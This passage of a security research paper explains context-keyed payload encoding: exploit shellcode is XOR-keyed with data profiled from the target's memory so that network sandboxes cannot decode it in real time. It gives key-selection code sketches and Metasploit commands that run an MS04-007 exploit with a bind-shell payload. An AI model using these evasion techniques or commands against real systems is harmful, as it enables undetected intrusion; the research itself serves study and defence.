encoded payload which produces a new, slightly larger payload. This new
|
||||
payload is then packaged within the exploit in place of the original.
|
||||
|
||||
1.1.1) Encoder
|
||||
|
||||
The encoder can take many forms and provide its function in a number of
|
||||
different ways. At its most basic definition, an encoder is simply a function
|
||||
used when packaging a payload for use by an exploit which encodes the payload
|
||||
into a different form than the original. There are many different encoders
|
||||
available today, some of which provide encoding such as alphanumeric
|
||||
mixed-case text[6], Unicode-safe mixed-case text[7], UTF-8 and tolower()
|
||||
safe[2], and XOR against a 4-byte key[8]. There is also an extremely
|
||||
impressive polymorphic XOR additive feedback encoder available called Shikata
|
||||
Ga Nai[9].
|
||||
|
||||
1.1.2) Decoder Stub
|
||||
|
||||
The decoder stub is a small chunk of instructions that is prepended to the
|
||||
encoded payload. When this new payload is executed on the target system, the
|
||||
decoder stub executes first and is responsible for decoding the original
|
||||
payload data. Once the original payload data is decoded, the decoder stub
|
||||
passes execution to the original payload. Decoder stubs generally perform a
|
||||
reversal of the encoding function, or in the case of an XOR obfuscation
|
||||
encoding, simply perform the XOR again against the same key value.
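
The symmetry of XOR encoding can be shown with a short Python sketch. It is
an illustration of the principle only: the function name xor_dword is
hypothetical, and a real decoder stub is a handful of machine instructions
rather than Python.

```python
def xor_dword(data, key):
    """XOR data against a repeating 4-byte key."""
    if len(key) != 4:
        raise ValueError("key must be exactly 4 bytes")
    return bytes(b ^ key[i % 4] for i, b in enumerate(data))
```

Because XOR is its own inverse, calling xor_dword a second time with the
same key restores the original bytes, which is all the decoder stub has to
do.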
|
||||
|
||||
1.1.3) Example: Metasploit Alpha2 Alphanumeric Mixedcase Encoder (x86)
|
||||
|
||||
The Metasploit Alpha2 Alphanumeric Mixedcase Encoder[6] encodes payloads as
|
||||
alphanumeric mixedcase text using SkyLined's Alpha2 encoding suite. This
|
||||
allows a payload encoded with this encoder to traverse such attack vectors as
|
||||
may require input to pass text validation functions such as the C89 standard
|
||||
functions isalnum() and isprint(), as well as the POSIX function
|
||||
isascii().
|
||||
|
||||
1.1.4) Keyed Encoders
|
||||
|
||||
Many encoders utilize encoding techniques which require a key value. The
|
||||
Call+4 Dword XOR encoder[8] and the Shikata Ga Nai polymorphic XOR additive
|
||||
feedback encoder[9] are examples of keyed encoders.
|
||||
|
||||
Key Selection
|
||||
|
||||
Encoders which make use of key data during their encoding process have
|
||||
traditionally used either random or static data chosen at the time of
|
||||
encoding, or data that is tied to the encoding process itself[10], such as the
|
||||
index value of the current position in the buffer being operated on, or a
|
||||
value relative to that index.
|
||||
|
||||
Example: Metasploit Single-byte XOR Countdown Encoder (x86)
|
||||
|
||||
The Metasploit Single-byte XOR Countdown Encoder[10] uses the length of the
|
||||
remaining payload to be operated upon as a position-dependent encoder key.
|
||||
The benefit that this provides is a smaller decoder stub, as the decoder stub
|
||||
does not need to contain any static keying information. Instead, it tracks
|
||||
the length property of the payload as it decodes and uses that information as
|
||||
the key.
|
||||
|
||||
Weaknesses
|
||||
|
||||
The most significant weakness of most keyed encoders available today is that
|
||||
the keying information that is used is either observable directly or
|
||||
constructible from the observed decoder stub. Either the static key
|
||||
information is transmitted within the exploit as part of the decoder stub
|
||||
itself, or the key information is reproducible once the encoding algorithm is
|
||||
known. Knowledge of the encoding algorithm is usually obtainable by
|
||||
recognizing known decoder stubs or analyzing an unknown decoder stub's
|
||||
instructions in detail.
|
||||
|
||||
The expected inherent functionality of the decoder stub also introduces a
|
||||
weakness. Modern payload encoders rely upon the decoder stub's ability to
|
||||
properly decode the payload at run-time. It is feasible that an active
|
||||
observer may exploit this inherent functionality to decode a suspected payload
|
||||
within a sandbox environment in real-time[5, 3] in order to inspect the contents of
|
||||
the payload and make a control decision about the network traffic it was found
|
||||
in. Because the decoder stub requires only that it is being executed by a
|
||||
processor that will understand its instruction-set, producing such a sandbox
|
||||
is trivial.
|
||||
|
||||
Unfortunately, all of the aforementioned keyed encoders include the static key
|
||||
value directly in their decoder stubs and are thus vulnerable to the
|
||||
weaknesses described here. This allows an observer of the encoded payload in
|
||||
transit to potentially decode the payload and inspect its content.
|
||||
Fortunately, all of the keyed encoders previously mentioned could potentially
|
||||
be improved to use contextual keying as is described in the following chapter.
|
||||
|
||||
2) Contextual Keying
|
||||
|
||||
Contextual keying is defined as the process of selecting an encoding key from
|
||||
context information that is either known or predictable about the target. A
|
||||
context-key is defined as the result of that process. The context information
|
||||
available about the exploit's target may contain any number of various types
|
||||
of information, dependent upon the attacker's proximity to the target,
|
||||
knowledge of the target's operation or internals, or knowledge of the target's
|
||||
environment.
|
||||
|
||||
2.1) Encoder
|
||||
|
||||
When utilizing a context-key, the method of encoding is largely unchanged from
|
||||
current methods. The exploit crafter simply passes the encoding function the
|
||||
context-key as its static key value. The size of the context-key is dependent
|
||||
upon the requirements of the encoder being used; however, it is feasible that
|
||||
the key may be of any fixed length, or ideally the same size as the payload
|
||||
being encoded.
|
||||
|
||||
2.2) Decoder Stub
|
||||
|
||||
The decoder stub that requires a context-key is not only responsible for
|
||||
decoding the encoded payload but is also responsible for retrieving or
|
||||
otherwise generating its context-key from the information that is available to
|
||||
it at run-time. This may include retrieving a value from a known memory
|
||||
address, performing some calculation on other information available to it, or
|
||||
any number of other possible scenarios. The following section will explore
|
||||
some of the possibilities.
|
||||
|
||||
2.3) Application Specific Keys
|
||||
|
||||
2.3.1) Static Application Data
|
||||
|
||||
If the attacker has the convenience of reproducing the operating environment
|
||||
and execution of the target application, or even simply has access to the
|
||||
application's executable, a context-key may be chosen from information known
|
||||
about the address space of the running process. Known locations of static
|
||||
values such as environment variables, global variables and constants such as
|
||||
version strings, help text, or error messages, or even the application's
|
||||
instructions or linked library instructions themselves may be used as
|
||||
contextual keying information.
|
||||
|
||||
Profiling the Application
|
||||
|
||||
To successfully select a context-key from a running application's memory, the
|
||||
application's memory must first be profiled. By polling the application's
|
||||
address space over a period of time, ranges of memory that change can be
|
||||
eliminated from the potential context-key data pool. The primary requirement
|
||||
of viable data in the process's memory space is that it does not
|
||||
change over time or between subsequent instantiations of the running
|
||||
application. After profiling is complete, the resultant list of memory
|
||||
addresses and static data will be referred to as the application's
|
||||
memory map.
|
||||
|
||||
Memory Map Creation
|
||||
|
||||
The basic steps to create a comprehensive memory map of a running process are:
|
||||
|
||||
1. Attach to the running process.
|
||||
2. Initialize the memory map with a poll of non-null bytes in the running
|
||||
process's virtual memory.
|
||||
3. Wait an arbitrary amount of time.
|
||||
4. Poll the process's virtual memory again.
|
||||
5. Find the differential between the contents of the memory map and the most
|
||||
recent memory poll.
|
||||
6. Eliminate any data that has changed between the two from the memory map.
|
||||
7. Optionally eliminate any memory ranges shorter than your desired key length.
|
||||
8. Go to step 3.
|
||||
|
||||
Continue the above process until changing data is no longer being eliminated
|
||||
and store the resulting memory map as a map of that instance of the target
|
||||
process. Restart the application and repeat the above process, producing a
|
||||
second memory map for the second instance of the target process. Compare the
|
||||
two memory maps for differences and again eliminate any data that differs.
|
||||
Repeat this process until changing data is no longer being eliminated.
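
The elimination procedure can be sketched in Python. The sketch assumes each
poll has already been captured as a dict mapping an address to the byte
found there. How the polls are obtained is outside its scope, and the
function names are hypothetical.

```python
def initial_map(snapshot):
    """Step 2: keep only the non-null bytes of the first poll."""
    return {addr: byte for addr, byte in snapshot.items() if byte != 0}


def refine_map(memory_map, snapshot):
    """Steps 5 and 6: drop every address whose byte changed or vanished."""
    return {
        addr: byte
        for addr, byte in memory_map.items()
        if snapshot.get(addr) == byte
    }


def build_map(polls):
    """Fold a sequence of polls (dicts of address -> byte) into one map."""
    polls = iter(polls)
    memory_map = initial_map(next(polls))
    for snapshot in polls:
        memory_map = refine_map(memory_map, snapshot)
    return memory_map
```

The same refine_map step works for comparing maps taken from separate
instances of the process, since a finished map has the same shape as a poll.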
|
||||
|
||||
The resulting final memory map for the process must then be analyzed for
|
||||
static data that may be directly relative to the environment of the process
|
||||
and may not be consistent across processes running within different
|
||||
environments such as on different hosts or in different networks. This type
|
||||
of data includes network addresses and ports, host names, operating system
|
||||
"unames", and so forth. This type of data may also include installation
|
||||
paths, user names, and other user-configurable options during installation of
|
||||
the application. This type of data does not include application version
|
||||
strings or other pertinent information which may be directly relative to the
|
||||
properties of the application which contribute to the application being
|
||||
vulnerable and successfully exploited.
|
||||
|
||||
Identifying this type of information relative to the application's environment
|
||||
will produce two distinct types of memory map data; one type containing static
|
||||
application context data, and the other type containing environment context
|
||||
data. Both of these types of data can be useful as potential context-key
|
||||
values; however, the former will be more portable amongst targets whereas the
|
||||
latter will only be useful when selecting key values for the actual target
|
||||
process that was actively profiled. If environment context data is undesirable,
profiling instances of the process on different network hosts and with
different installation configuration options as part of the memory map
generation process outlined above will likely eliminate it from the memory map
entirely.
|
||||
|
||||
Finally, the memory maps can be trimmed of any remaining NULL bytes to reduce
|
||||
their size. The final memory map should consist of records containing memory
|
||||
addresses and the string of static data which can be found in memory at those
|
||||
locations.
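
One possible way to produce such records from a byte-level map is sketched
below. It assumes the map is a dict of address to byte value. The function
name to_records and the min_length parameter (which corresponds to the
optional elimination of ranges shorter than the desired key length) are
illustrative choices, not part of any existing tool.

```python
def to_records(memory_map, min_length=1):
    """Collapse an address -> byte map into (start_address, bytes) records.

    Runs of consecutive addresses become one record. Null bytes end a run
    and are dropped, as are runs shorter than min_length.
    """
    records = []
    run_start = None
    run = bytearray()
    previous = None
    for addr in sorted(memory_map):
        byte = memory_map[addr]
        contiguous = previous is not None and addr == previous + 1
        if byte == 0 or not contiguous:
            # Close the current run before starting a new one.
            if run and len(run) >= min_length:
                records.append((run_start, bytes(run)))
            run_start, run = None, bytearray()
        if byte != 0:
            if run_start is None:
                run_start = addr
            run.append(byte)
            previous = addr
        else:
            previous = None
    if run and len(run) >= min_length:
        records.append((run_start, bytes(run)))
    return records
```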
|
||||
|
||||
Memory Map Creation Methods
|
||||
|
||||
Metasploit Framework's msfpescan
|
||||
|
||||
One method to create a memory map of viable addresses and values is to use a
|
||||
tool provided by the Metasploit Framework called msfpescan. msfpescan is
|
||||
designed to scan PE formatted executable files and return the requested
|
||||
portion of the .text section of the executable. Data found in the .text
|
||||
section is useful as potential context-key data as the .text section is marked
|
||||
read-only when mapped into a process' address space and is therefore static
|
||||
and will not change. Furthermore, msfpescan predicts where in the executed
|
||||
process' address space these static values will be located, thus providing
|
||||
both the static data values as well as the addresses at which those values can
|
||||
be retrieved.
|
||||
|
||||
To illustrate, suppose a memory map for the Windows Server service needs to be
|
||||
created for exploitation of the vulnerability described in Microsoft Security
|
||||
Bulletin MS06-040[11] by an exploit which will employ a context-keyed payload
|
||||
encoder. A common DLL that is linked into the service's executable when
|
||||
compiled can be selected as the target for msfpescan. In this case,
|
||||
ws2help.dll is chosen due to its lack of updates since August 23rd, 2001.
|
||||
Because this particular DLL has remained unchanged for over six years, its
|
||||
instructions provide a particularly consistent cache of potential context-keys
|
||||
for an exploit targeting an application linked against it anytime during the
|
||||
last six years. A scan of the first 1024 bytes of ws2help.dll's executable
|
||||
instructions can be performed by executing the following command:
|
||||
|
||||
msfpescan -b 0x0 -A 1024 ws2help.dll
|
||||
|
||||
Furthermore, msfpescan has been improved via this research effort to render
|
||||
data directly as a memory map. This improved version is available in the
|
||||
Metasploit Framework as of version 3.1. A scan and dump to memory map of
|
||||
ws2help.dll's executable instructions can be performed by executing the
|
||||
following command:
|
||||
|
||||
msfpescan --context-map context ws2help.dll
|
||||
|
||||
It is important to note that this method of memory map generation is much less
|
||||
comprehensive than the method previously outlined; however, when targeting a
|
||||
process whose executable is relatively large and links in a large number of
|
||||
libraries, profiling only the instruction portions of the executable and
|
||||
library files involved may provide an adequately-sized memory map for
|
||||
context-key selection.
|
||||
|
||||
Metasploit Framework's memdump.exe
|
||||
|
||||
The Metasploit Framework also provides another useful tool for the profiling
|
||||
of a running process' memory called memdump.exe. memdump.exe is used to dump
|
||||
the entire memory space of a running process. This tool can be used to
|
||||
provide the polling step of the memory map creation process previously
|
||||
outlined. By producing multiple memory dumps over a period of time, the dumps
|
||||
can be compared to isolate static data.
|
||||
|
||||
smem-map
|
||||
|
||||
A tool for profiling a Linux process' address space and creating a memory map
|
||||
is provided by this research effort. The smem-map tool[12] was created as a
|
||||
reference implementation of the process outlined at the beginning of this
|
||||
section. smem-map is a Linux command-line application and relies on the proc
|
||||
filesystem as an interface to the target process' address space.
|
||||
|
||||
The first time smem-map is used against a target process, it will populate an
|
||||
initial memory map with all non-null bytes currently found in the process's
|
||||
virtual memory. Subsequent polls of the memory ranges that were initially
|
||||
identified will eliminate data that has changed between the memory map and the
|
||||
most recent poll of the process's memory. If the tool is stopped and
|
||||
restarted and the specified memory map file exists, the file will be reloaded
|
||||
as the memory map to be compared against instead of populating an entirely new
|
||||
memory map. Using this functionality, a memory map can be refined over
|
||||
multiple sessions of the tool as well as multiple instantiations of the target
|
||||
process. A scan of a running process' address space can be performed by
|
||||
executing the following command:
|
||||
|
||||
smem-map <PID> output.map
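
The polling behavior described above can be sketched in a few lines of Python. This is only an illustration of the idea and not smem-map's actual code: the function names `initial_map` and `refine` are hypothetical, and each poll is assumed to be a `bytes` snapshot of one memory range starting at `base`.

```python
def initial_map(snapshot: bytes, base: int) -> dict:
    """Record every non-null byte of the first poll, keyed by address."""
    return {base + i: b for i, b in enumerate(snapshot) if b != 0}


def refine(memory_map: dict, snapshot: bytes, base: int) -> dict:
    """Keep only the addresses whose value is unchanged in a later poll."""
    return {
        addr: val
        for addr, val in memory_map.items()
        if 0 <= addr - base < len(snapshot) and snapshot[addr - base] == val
    }
```

Calling `refine` once per poll, across sessions or across restarts of the target, leaves only the bytes that have so far remained static.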
|
||||
|
||||
Context-Key Selection
|
||||
|
||||
Once a memory map has been created for the target application, the encoder may
|
||||
select any sequential data from any memory address within the memory map which
|
||||
is both large enough to fill the desired key length and also does not produce
|
||||
any disallowed byte values in the encoded payload as defined by restrictions
|
||||
to the attack vector for the vulnerability. The decoder stub should then
|
||||
retrieve the context-key from the same memory address when executed at the
|
||||
target. If the decoder stub is developed so that it may read individual bytes
|
||||
of data from different locations, the encoder may select individual bytes from
|
||||
multiple addresses in the memory map. The encoder must note the memory
|
||||
address or addresses at which the context-key is read from the memory map for
|
||||
inclusion in the decoder stub.
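
A minimal sketch of this selection step follows. It assumes a plain repeating XOR rather than any particular encoder's algorithm, a memory map already loaded as a list of `(base_address, data)` chunks, and a 32-bit little-endian address embedded in the decoder stub (so the address is also checked for disallowed bytes). The name `find_context_key` is hypothetical.

```python
import struct


def find_context_key(memory_map, payload, badchars, key_len=4):
    """Return (address, key) for the first usable key, or None.

    memory_map is a list of (base_address, data_bytes) chunks.
    """
    bad = set(badchars)
    for base, data in memory_map:
        for off in range(len(data) - key_len + 1):
            addr = base + off
            # The address is embedded in the decoder stub, so it must
            # also avoid disallowed bytes (an assumption of this sketch).
            if bad.intersection(struct.pack("<I", addr)):
                continue
            key = data[off:off + key_len]
            encoded = bytes(b ^ key[i % key_len] for i, b in enumerate(payload))
            if not bad.intersection(encoded):
                return addr, key
    return None
```

The returned address is what the decoder stub would later read from; the key bytes themselves never appear in the transmitted payload.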
|
||||
|
||||
Proof of Concept: Improved Shikata ga Nai
|
||||
|
||||
The Shikata ga Nai encoder[9], included with the Metasploit Framework, implements
|
||||
polymorphic XOR additive feedback encoding against a four byte key. The
|
||||
decoder stub that is prepended to a payload which has been encoded by Shikata
|
||||
ga Nai is generated based on dynamic instruction substitution and dynamic
|
||||
block ordering. The registers used by the decoder stub instructions are also
|
||||
selected dynamically when the decoder stub is constructed.
|
||||
|
||||
Improving the original Metasploit implementation of Shikata ga Nai to use
|
||||
contextual keying was fairly trivial. Instead of randomly selecting a four
|
||||
byte key prior to encoding, a key is instead chosen from a supplied memory
|
||||
map. Furthermore, when generating the decoder stub, the original
|
||||
implementation used a "mov reg, val" instruction (0xb8) to move the key value
|
||||
directly from its location in the decoder stub into the register it will use
|
||||
for the XOR operation. The context-key version instead uses a "mov reg,
|
||||
[addr]" instruction (0xa1) to retrieve the context-key from the memory
|
||||
location at [addr] and store it in the same register. The update to the
|
||||
Shikata ga Nai decoder stub was literally as simple as changing one
|
||||
instruction, and providing that instruction with the context-key's location
|
||||
address rather than a static key value directly.
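
The one-instruction difference can be illustrated with the raw bytes of the two forms. This sketch covers only the EAX case, where the opcodes are exactly the 0xb8 and 0xa1 named above; the real encoder selects registers dynamically, and the helper names here are hypothetical.

```python
import struct


def load_static_key(key: int) -> bytes:
    # mov eax, imm32: opcode 0xB8 followed by the key value itself
    return b"\xb8" + struct.pack("<I", key)


def load_context_key(addr: int) -> bytes:
    # mov eax, [addr]: opcode 0xA1 followed by the address holding the key
    return b"\xa1" + struct.pack("<I", addr)
```

Both forms are five bytes long, so the swap does not change the layout of the rest of the stub in this EAX-only illustration.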
|
||||
|
||||
|
||||
The improved version of Shikata ga Nai described here is provided by this
|
||||
research effort and is available in the Metasploit Framework as of version
|
||||
3.1. It can be utilized as follows from the Metasploit Framework Console
|
||||
command-line, after the usual exploit and payload commands:
|
||||
|
||||
set ENCODER x86/shikata_ga_nai
set EnableContextEncoding 1
set ContextInformationFile <application.map>
exploit
|
||||
|
||||
Case Study: MS04-007 vs. Windows XP SP0
|
||||
|
||||
The Metasploit framework currently provides an exploit for the vulnerability
|
||||
described in Microsoft Security Bulletin MS04-007[13]. The vulnerable application
|
||||
in this case is the Microsoft ASN.1 Library.
|
||||
|
||||
Before any exploitation using contextual keying can take place, the vulnerable
|
||||
application must be profiled. By opening the affected library from Windows XP
|
||||
Service Pack 0 in a debugger, a list of libraries that it itself includes can
|
||||
be gleaned. By collecting said library DLL files from the target vulnerable
|
||||
system, or an equivalent system in the lab, msfpescan can then be used to
|
||||
create a memory map:
|
||||
|
||||
msfpescan --context-map context \
ms04-007-dlls/*
cat context/* >> ms04-007.map
|
||||
|
||||
After the memory map has been created, it can be provided to Metasploit and
|
||||
Shikata ga Nai to encode the payload that Metasploit will use to exploit the
|
||||
vulnerable system:
|
||||
|
||||
use exploit/windows/smb/ms04-007-killbill
set PAYLOAD windows/shell_bind_tcp
set ENCODER x86/shikata_ga_nai
set EnableContextEncoding 1
set ContextInformationFile ms04-007.map
exploit
|
||||
|
||||
2.3.2) Event Data
|
||||
|
||||
Similar to the static application data approach, transient data may also be
|
||||
used as a context-key so long as it persists long enough for the decoder stub
|
||||
to access it. Consider the scenario of a DNS server which is vulnerable to an
|
||||
overflow when parsing an incoming host name or address look-up request. If
|
||||
portions of the request are stored in memory prior to the vulnerability being
|
||||
triggered, the data provided by the request could potentially be used for
|
||||
contextual keying if its location is predictable. Values such as IP
|
||||
addresses, port numbers, packet sequence numbers, and so forth are all
|
||||
potentially viable for use as a context-key.
|
||||
|
||||
2.3.3) Supplied Data
|
||||
|
||||
Similar to Event Data, an attacker may also be able to supply key data for
|
||||
later use to the memory space of the target application prior to exploitation.
|
||||
Consider the scenario of a caching HTTP proxy that exhibits the behavior of
|
||||
keeping recently requested resources in memory for a period of time prior to
|
||||
flushing them to disk for longer-term storage. If the attacker is aware of
|
||||
this behavior, the potential exists for the attacker to cause the proxy to
|
||||
retrieve a malicious web resource which contains a wealth of usable
|
||||
context-key data. Even if the attacker cannot predict where in memory the
|
||||
data may be stored, by having control of the data that is being stored other
|
||||
exploitation techniques such as egg hunting[14, 9][15] may be used by a
|
||||
decoder-stub to locate and retrieve context-key information when its exact
|
||||
location is unknown.
|
||||
|
||||
2.4) Temporal Keys
|
||||
|
||||
The concept of a temporal address was previously introduced by the paper
|
||||
entitled Temporal Return Addresses: Exploitation Chronomancy[16, 3]. In
|
||||
summary, a temporal address is a location in memory which holds timer data of
|
||||
some form. Potential types of timer data stored at a temporal address include
|
||||
such data as the system date and time, number of seconds since boot, or a
|
||||
counter of some other form.
|
||||
|
||||
The research presented in the aforementioned paper focused on leveraging the
|
||||
timer data found at such addresses as the return address used for
|
||||
vulnerability exploitation. As such, the viability of the data found at the
|
||||
temporal address was constrained by two properties of the data defined as
|
||||
scale, and period. These two properties dictate the window of time during
|
||||
which the data found at the temporal address will equate to the desired
|
||||
instructions. Another potential constraint for use of a temporal address as
|
||||
an exploit return address stems from the fact that the value contained at the
|
||||
temporal address is called directly for use as an executable instruction. If
|
||||
the memory range it is contained within is marked as non-executable such as
|
||||
with the more recent versions of Windows[16, 19], attempting use in this manner
|
||||
will cause an exception.
|
||||
|
||||
For the purpose that temporal addresses will be employed here, such strict
|
||||
constraints as those previously mentioned do not exist. Rather, the only
|
||||
desired property of the data stored at the temporal address which will be used
|
||||
as a context-key is that it does not change, or as in the case of temporal
|
||||
data, does not change during the time window in which we intend to use it.
|
||||
Due to this difference in requirements, the actual content of the temporal
|
||||
address is somewhat irrelevant and therefore is not constrained to a
|
||||
time-window in either the future or the past during which the data found at
|
||||
the temporal address will be fit for purpose. The viable time-window in the
|
||||
case of use for contextual keying is entirely constrained by duration rather
|
||||
than location along the time-line. Due to the values at different byte
|
||||
offsets within data found at a temporal address having differing update
|
||||
frequencies, selection of key data from these values produces varying duration
|
||||
time-windows during which the values will remain constant. By using single
|
||||
byte, dual byte, or otherwise relatively short context-keys, and carefully
|
||||
selecting from the available byte values stored within the timer found at the
|
||||
temporal address, the viable time-window chosen can be made to be quite
|
||||
lengthy.
|
||||
|
||||
2.4.1) Context-Key Selection
|
||||
|
||||
Provided by the previously mentioned temporal return address research effort
|
||||
is a very useful tool called telescope[16, 8]. The tool's function is to analyze a
|
||||
running process' memory for potential temporal addresses and report them to
|
||||
the user. By using this tool, potential context-key values and the addresses
|
||||
at which they reside can be respectively predicted and identified.
|
||||
|
||||
The temporal return addresses paper also revealed a section of memory that is
|
||||
mapped into all processes running on Windows NT, or any other more recent
|
||||
Windows system, called SharedUserData[16, 17]. The interesting properties of the
|
||||
SharedUserData region of a process' address space are that it is always mapped
|
||||
into memory at a predictable location and is required to be backwards
|
||||
compatible with previous versions. As such, the individual values contained
|
||||
within the region will always be at the same offset from its predictable base
|
||||
address. One of the values contained within this region of memory is the
|
||||
system time, which will be used in the examples to follow.
|
||||
|
||||
Remotely Determining Time
|
||||
|
||||
Methods and techniques for profiling a target system's current time are outside
|
||||
of the scope of this paper, however the aforementioned paper on temporal
|
||||
return addresses[16, 13-15] offers some insight. Once a target system's
|
||||
current time has been identified, the values found at various temporal
|
||||
addresses in memory can be readily predicted to varying degrees of accuracy.
|
||||
|
||||
Time-Window Selection
|
||||
|
||||
It is important to note that when using data stored at a temporal address as a
|
||||
context-key, parts of that value are likely to be changing frequently.
|
||||
Fortunately, the key length being used may not require use of the entire timer
|
||||
value, and as such the values found at the byte offsets that are frequently
|
||||
changing can likely be ignored. Consider the SystemTime value from the
|
||||
Windows SharedUserData region of memory. SystemTime is a 100 nanosecond timer
|
||||
which is measured from January 1st, 1601, is stored as a KSYSTEM_TIME
|
||||
structure, and is located at memory address 0x7ffe0014 on all versions of
|
||||
Windows NT[16, 16]:
|
||||
|
||||
0:000> dt _KSYSTEM_TIME
+0x000 LowPart : Uint4B
+0x004 High1Time : Int4B
+0x008 High2Time : Int4B
|
||||
|
||||
Due to this timer's frequent update period, granularity, and scale, some of
|
||||
the data contained at the temporal address will be too transient for use as a
|
||||
context-key. The capacity of SystemTime is twelve bytes, however due to the
|
||||
four bytes labeled as High2Time having an identical value as the four bytes
|
||||
labeled as High1Time, only the first eight bytes are relevant as a timer. As
|
||||
shown by the calculations provided by the temporal return addresses paper[16,
|
||||
10], reproduced in the table below, it is only worth focusing on values
|
||||
beginning at byte index four of the SystemTime value, or the four bytes
|
||||
labeled as High1Time located at address 0x7ffe0018.
|
||||
|
||||
+------+----------------------------------+
| Byte | Seconds (ext)                    |
+------+----------------------------------+
| 0    | 0 (zero)                         |
| 1    | 0 (zero)                         |
| 2    | 0 (zero)                         |
| 3    | 1 (1 sec)                        |
| 4    | 429 (7 mins 9 secs)              |
| 5    | 109951 (1 day 6 hours 32 mins)   |
| 6    | 28147497 (325 days 18 hours)     |
| 7    | 7205759403 (228 years 179 days)  |
+------+----------------------------------+
|
||||
|
||||
It is also interesting to note that if the payload encoder only utilizes a
|
||||
single byte context-key, it may not even be required that the attacker
|
||||
determine the target system's time, as the value at byte index six or seven of
|
||||
the SystemTime value could be used requiring only that the attacker guess the
|
||||
system time to within a little less than a year, or to within 228 years,
|
||||
respectively.
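
The per-byte durations in the table above follow directly from the timer's 100 nanosecond granularity: the byte at index n increments once every 256^n ticks. A small sketch that reproduces the figures (the function name is hypothetical):

```python
TICKS_PER_SECOND = 10_000_000  # SystemTime counts 100-nanosecond intervals


def seconds_per_increment(byte_index: int) -> int:
    """Whole seconds that elapse before the byte at byte_index changes."""
    return 256 ** byte_index // TICKS_PER_SECOND
```

Evaluating this for byte indexes 0 through 7 yields 0, 0, 0, 1, 429, 109951, 28147497, and 7205759403 seconds, matching the table.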
|
||||
|
||||
3) Weaknesses
|
||||
|
||||
Due to the cryptographically weak properties of using functions such as XOR to
|
||||
obfuscate data, there exist well known attacks against these methods and their
|
||||
keying information. Although payload encoders which employ XOR as their
|
||||
obfuscation algorithm have been discussed extensively throughout this paper,
|
||||
it is not the author's intent to tie the contextual keying technique
|
||||
presented here to such algorithms. Rather, contextual keying could just as
|
||||
readily be used with cryptographically strong encoding algorithms as well. As
|
||||
such, attacks against the encoding algorithm used, or specifically against the
|
||||
XOR algorithm, are outside the scope of this paper and will not be detailed
|
||||
herein.
|
||||
|
||||
4) Conclusion
|
||||
|
||||
While the use of context-keyed payload encoders likely won't prevent a
|
||||
dedicated forensic analyst from successfully performing an off-line analysis
|
||||
of an exploit's encoded payload, the system it was targeting, and the target
|
||||
application in an attempt to discover the key value used, use of the
|
||||
contextual keying technique will prevent an automated system from decoding the
|
||||
payload in real-time if it does not have access to, or an automated method of
|
||||
constructing, an adequate memory map of the target from which to retrieve the
|
||||
key.
|
||||
|
||||
As systems hardware technology and software capability continue to improve,
|
||||
network security and monitoring systems will likely begin to join the few
|
||||
currently existing systems[5, 2-4][4] that attempt to perform this type of real-time
|
||||
analysis of suspected network exploit traffic, and more specifically, exploit
|
||||
payloads.
|
||||
|
||||
4.1) Acknowledgments
|
||||
|
||||
The Author would like to thank H.D. Moore and Matt Miller a.k.a. skape for
|
||||
their assistance in development of the improved Metasploit implementation of
|
||||
the Shikata ga Nai payload encoder as Proof of Concept as well as the
|
||||
supporting tools provided by this research effort.
|
||||
|
||||
References
|
||||
|
||||
[1] Ivan Arce. The shellcode generation. IEEE Security & Privacy,
|
||||
2(5):72-76, 2004.
|
||||
|
||||
[2] skape. Implementing a custom x86 encoder. Uninformed Journal, 5(3),
|
||||
September 2006.
|
||||
|
||||
[3] Jack Koziol, David Litchfield, Dave Aitel, Chris Anley, Sinan Eren, Neel
|
||||
Mehta, Riley Hassell. The Shellcoder's Handbook: Discovering and
|
||||
Exploiting Security Holes. John Wiley & Sons, 2004.
|
||||
|
||||
[4] Paul Baecher and Markus Koetter. libemu. http://libemu.mwcollect.org/,
|
||||
2007.
|
||||
|
||||
[5] R. Smith, A. Pridgen, B. Thomason, and V. Shmatikov. Shellshock: Luring
|
||||
malware into virtual honeypots by emulated response. October 2005.
|
||||
|
||||
[6] SkyLined and Pusscat. Alpha2 alphanumeric mixedcase encoder (x86).
|
||||
http://framework.metasploit.com/encoders/view/?refname=x86:alpha_mixed.
|
||||
|
||||
[7] SkyLined and Pusscat. Alpha2 alphanumeric unicode mixedcase encoder (x86).
|
||||
http://framework.metasploit.com/encoders/view/?refname=x86:unicode_mixed.
|
||||
|
||||
[8] H.D. Moore and spoonm. Call+4 dword xor encoder (x86).
|
||||
http://framework.metasploit.com/encoders/view/?refname=x86:call4_dword_xor.
|
||||
|
||||
[9] spoonm. Polymorphic xor additive feedback encoder (x86).
|
||||
http://framework.metasploit.com/encoders/view/?refname=x86:shikata_ga_nai.
|
||||
|
||||
[10] vlad902. Single-byte xor countdown encoder (x86).
|
||||
http://framework.metasploit.com/encoders/view/?refname=x86:countdown.
|
||||
|
||||
[11] Microsoft. Microsoft security bulletin ms06-040.
|
||||
http://www.microsoft.com/technet/security/bulletin/ms06-040.mspx, August
|
||||
2006.
|
||||
|
||||
[12] |)ruid. smem-map - the static memory mapper.
|
||||
https://sourceforge.net/projects/smem-map.
|
||||
|
||||
[13] Microsoft. Microsoft security bulletin ms04-007.
|
||||
http://www.microsoft.com/technet/security/bulletin/ms04-007.mspx,
|
||||
February, 2004.
|
||||
|
||||
[14] The Metasploit Staff. Metasploit 3.0 Developer's Guide.
|
||||
The Metasploit Project, December 2005.
|
||||
|
||||
[15] skape. Safely searching process virtual address space.
|
||||
http://hick.org/code/skape/papers/egghunt-shellcode.pdf, September 2004.
|
||||
|
||||
[16] skape. Temporal return addresses. Uninformed Journal, 2(2), September
|
||||
2005.
|
||||
|
||||
[17] SweetScape Software. 010 editor. http://www.sweetscape.com/010editor/,
|
||||
2002.
|
||||
|
||||
[18] |)ruid. Memorymap.bt. http://druid.caughq.org/src/MemoryMap.bt, 2007.
|
||||
|
||||
Appendix
|
||||
|
||||
A) Memory Map File Specification
|
||||
|
||||
The memory map files created by this research effort's supporting tools adhere
|
||||
to the file format specification described here. The file format is designed
|
||||
specifically to be simple, light weight, and versatile.
|
||||
|
||||
A.1) File Format
|
||||
|
||||
An entire memory map file is comprised of individual data records concatenated
|
||||
together. These individual data records represent a chunk of data found in a
|
||||
process's memory space. This simple format allows for multiple memory map
|
||||
files to be further concatenated to produce a single larger memory map file.
|
||||
Individual data records are comprised of the following elements:
|
||||
|
||||
+----------+------------+--------------+
| Bit-Size | Byte-Order | Element      |
+----------+------------+--------------+
| 8        | n/a        | Data Type    |
| 32       | big-endian | Base Address |
| 32       | big-endian | Size         |
| Size     | n/a        | Data         |
+----------+------------+--------------+
|
||||
|
||||
A.2) Data Type Values
|
||||
|
||||
